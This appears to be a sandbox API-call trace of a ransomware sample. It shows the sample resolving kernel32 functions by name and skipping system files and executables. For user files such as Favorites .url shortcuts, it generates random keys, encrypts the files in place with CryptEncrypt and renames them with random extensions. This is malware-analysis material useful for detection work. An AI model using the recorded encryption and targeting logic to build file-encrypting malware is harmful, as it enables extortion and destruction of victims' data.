[0185.642] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.642] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.643] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.643] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.643] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.643] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.643] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.643] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.643] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.643] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.643] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.643] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.643] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.643] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.643] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.643] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.643] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.643] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.643] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.643] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.643] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.644] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.644] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.644] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.644] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.644] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.644] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.644] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.644] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.644] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.644] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.644] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.644] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.644] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.644] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.644] lstrlenA (lpString="DELETEATOM") returned 10 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.644] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.644] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.644] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.645] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.645] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.645] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.645] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.645] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.645] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.645] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.645] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.645] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.645] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.645] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.645] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.645] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.645] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.645] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.645] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.645] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.645] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.645] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.646] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.646] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.646] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.646] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.646] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.646] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.646] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.646] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.646] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.646] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.646] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0185.646] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.646] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.646] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.646] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.646] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.646] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.646] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.646] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.647] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.647] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.647] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.647] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.647] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.647] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.BhG1b") returned 72 [0185.647] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.BhG1b.urSPs") returned 78 [0185.647] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.BhG1b" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.bhg1b"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.BhG1b.urSPs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.bhg1b.ursps"), dwFlags=0x0) returned 1 [0185.648] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.648] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.648] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.648] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaef079c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Sports.url.BhG1b", cAlternateFileName="MSNSPO~1.BHG")) returned 1 [0185.648] lstrcmpiW (lpString1="MSN Sports.url.BhG1b", lpString2="DECRYPT-FILES.txt") returned 1 [0185.648] lstrcmpiW (lpString1="MSN Sports.url.BhG1b", lpString2="autorun.inf") returned 1 [0185.648] lstrcmpiW (lpString1="MSN Sports.url.BhG1b", lpString2="boot.ini") returned 1 [0185.648] lstrcmpiW (lpString1="MSN Sports.url.BhG1b", lpString2="desktop.ini") returned 1 [0185.648] lstrcmpiW (lpString1="MSN Sports.url.BhG1b", lpString2="ntuser.dat") returned -1 [0185.649] lstrcmpiW (lpString1="MSN Sports.url.BhG1b", lpString2="iconcache.db") returned 1 [0185.649] lstrcmpiW (lpString1="MSN Sports.url.BhG1b", lpString2="bootsect.bak") returned 1 [0185.649] lstrcmpiW (lpString1="MSN Sports.url.BhG1b", lpString2="ntuser.dat.log") returned -1 [0185.649] lstrcmpiW (lpString1="MSN Sports.url.BhG1b", lpString2="thumbs.db") returned -1 [0185.649] lstrcmpiW (lpString1="MSN Sports.url.BhG1b", lpString2="Bootfont.bin") returned 1 [0185.649] lstrlenW (lpString="MSN Sports.url.BhG1b") returned 20 [0185.649] lstrcmpiW (lpString1="BhG1b", lpString2="lnk") returned -1 [0185.649] lstrcmpiW (lpString1="BhG1b", lpString2="exe") returned -1 [0185.649] lstrcmpiW (lpString1="BhG1b", lpString2="sys") returned -1 [0185.649] lstrcmpiW (lpString1="BhG1b", lpString2="dll") returned -1 [0185.649] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0185.649] lstrlenW (lpString="MSN Sports.url.BhG1b") returned 20 [0185.649] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0185.649] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSN Sports.url.BhG1b" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.BhG1b") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.BhG1b" [0185.649] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.649] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.BhG1b" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.bhg1b"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.649] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=397) returned 1 [0185.649] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.650] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.650] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.650] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.650] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.650] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x100) returned 1 [0185.650] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.651] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.651] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.651] CloseHandle (hObject=0x268) returned 1 [0185.651] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.651] WriteFile (in: hFile=0x264, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe1b0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe1b0*=0x108, lpOverlapped=0x0) returned 1 [0185.653] CloseHandle (hObject=0x0) returned 0 [0185.653] CloseHandle (hObject=0x264) returned 1 [0185.653] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.653] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.653] GetTickCount () returned 0x1135a70 [0185.653] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.653] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.653] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.654] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.654] lstrlenA (lpString="kernel32.dll") returned 12 [0185.654] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.654] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.654] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.654] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.654] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.654] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.654] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.654] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.654] lstrlenA (lpString="ADDATOMA") returned 8 [0185.654] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.654] lstrlenA (lpString="ADDATOMW") returned 8 [0185.654] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.654] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.654] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.654] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.654] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.654] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.654] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.654] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.654] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.654] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.655] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.655] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.655] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.655] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.655] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 